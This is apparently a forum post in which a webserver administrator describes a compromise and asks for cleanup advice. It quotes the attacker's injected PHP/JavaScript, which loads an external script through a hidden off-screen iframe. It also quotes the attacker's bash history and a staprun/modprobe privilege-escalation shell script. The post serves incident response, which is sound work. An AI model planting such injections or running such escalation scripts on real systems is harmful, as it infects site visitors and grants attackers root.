Possible Duplicate:
My server’s been hacked EMERGENCY
I run a webserver which over the last few days seems to have become infected with malware that tries to include content from "http://g00glestatic.com/s.js"
It appears the attacker gained access to one of the user accounts (not root), made a few changes, added a few files and ran a few
bash commands.
These changes stuck out clearly to me because it is not a shared server and I am the only person with access through very secure passwords.
The php/javascript code that was added
.php files, this code was added:
#9c282e#
if(!$srvc_counter) {
echo "<script type=\"text/javascript\" src=\"http://g00glestatic.com/s.js\"></script>";
$srvc_counter = true;}
#/9c282e#
.js files, this code was added:
/*9c282e*/
var _f = document.createElement('iframe'),_r = 'setAttribute';
_f[_r]('src', 'http://g00glestatic.com/s.js');
_f.style.position = 'absolute';_f.style.width = '10px';
_f[_r]('frameborder', navigator.userAgent.indexOf('bf3f1f8686832c30d7c764265f8e7ce8') + 1);
_f.style.left = '-5540px';
document.write('<div id=\'MIX_ADS\'></div>');
document.getElementById('MIX_ADS').appendChild(_f);
/*/9c282e*/
The
bash command
taken from .bash_history (Some usernames/passwords have been subbed)
su -c id $replacedPassword id; id;
sudo id; replacedPassword id;
cd /home/replacedUserId1;
chmod +x .sess_28e2f1bc755ed3ca48b32fbcb55b91a7; ./.sess_28e2f1bc755ed3ca48b32fbcb55b91a7;
rm /home/replacedUserId1/.sess_28e2f1bc755ed3ca48b32fbcb55b91a7; id;
cd /home/replacedUserId1;
chmod +x .sess_05ee5257fed0ac8e0f12096f4c3c0d20; ./.sess_05ee5257fed0ac8e0f12096f4c3c0d20;
rm /home/replacedUserId1/.sess_05ee5257fed0ac8e0f12096f4c3c0d20; id;
cd /home/replacedUserId1;
chmod +x .sess_bfa542fc2578cce68eb373782c5689b9; ./.sess_bfa542fc2578cce68eb373782c5689b9;
rm /home/replacedUserId1/.sess_bfa542fc2578cce68eb373782c5689b9; id;
cd /home/replacedUserId1;
chmod +x .sess_bfa542fc2578cce68eb373782c5689b9; ./.sess_bfa542fc2578cce68eb373782c5689b9;
rm /home/replacedUserId1/.sess_bfa542fc2578cce68eb373782c5689b9; id;
cd /home/replacedUserId1;
chmod +x .sess_fb19dfb52ed4a3ae810cd4454ac6ef1e; ./.sess_fb19dfb52ed4a3ae810cd4454ac6ef1e;
rm /home/replacedUserId1/.sess_fb19dfb52ed4a3ae810cd4454ac6ef1e; id;
kill -9 $$;;
kill -9 $$;;
kill -9 $$;
The above seems to move files added to the public_html to the level above?
I also have all 4 of the files that were added:
.sess_28e2f1bc755ed3ca48b32fbcb55b91a7
.sess_05ee5257fed0ac8e0f12096f4c3c0d20
.sess_bfa542fc2578cce68eb373782c5689b9
.sess_fb19dfb52ed4a3ae810cd4454ac6ef1e
Of those four above files, three are none viewable in notepad++ and display null characters, whereas sess_fb19dfb52ed4a3ae810cd4454ac6ef1e consists of:
#!/bin/sh
export PATH=$PATH:/sbin:/usr/sbin:/usr/local/bin:/usr/local/sbin:/usr/bin;
export LC_ALL=en_US.UTF-8 LC_COLLATE=en_US.UTF-8 LC_CTYPE=en_US.UTF-8 LANG=en_US.UTF-8 LANGUAGE=en_US.UTF-8
export TERM=linux
echo -n "-> checking staprun: ";
if which staprun 2>&1 | grep -q "no $1";
then
flag=1
elif [ -z "`which $1 2>&1`" ];
then
flag=1;
fi
if [ "$flag" = "1" ];
then
echo "no staprun, exiting"; exit;
else
echo "found";
echo "-> trying to exploit... ";
printf "install uprobes /bin/sh" > ololo.conf;
MODPROBE_OPTIONS="-C ololo.conf" staprun -u ololo
rm -f ololo.conf
fi
Other Noticeable Edits
Any files that contain:
([.htaccess]|[index|header|footer].php|[*.js])
will have been modified and all system file and directory permissions will have been changed to: x--x--x
My steps to remove this malware
re uploaded original php/js files to revert any changes
Changed all user passwords
Modified hosts.allow to a static ip so that only I have access
Removed the above 4 files and checked all modified file dates within that directory to check for any other recent modifications, none can be found
Conclusion
I'm hoping that as they did not have root access, any changes they wished to make higher up failed and they were only able to display an iframe on the site for a short amount of time?
What else do I need to look for to check the malware infection has not spread?
Second Conclusion
This malware sinks too deep to 'clean', if you get infected I recommend a server nuke and rebuild from backups with increased security.
Possibility
It's possible that Filezilla ftp passwords were stolen through a trojan as they're unfortunately stored unencrypted. However Trend Micro Titanium has not found any.
The settings box to disable passwords being saved has now been ticked, I also recommend that you take this action.
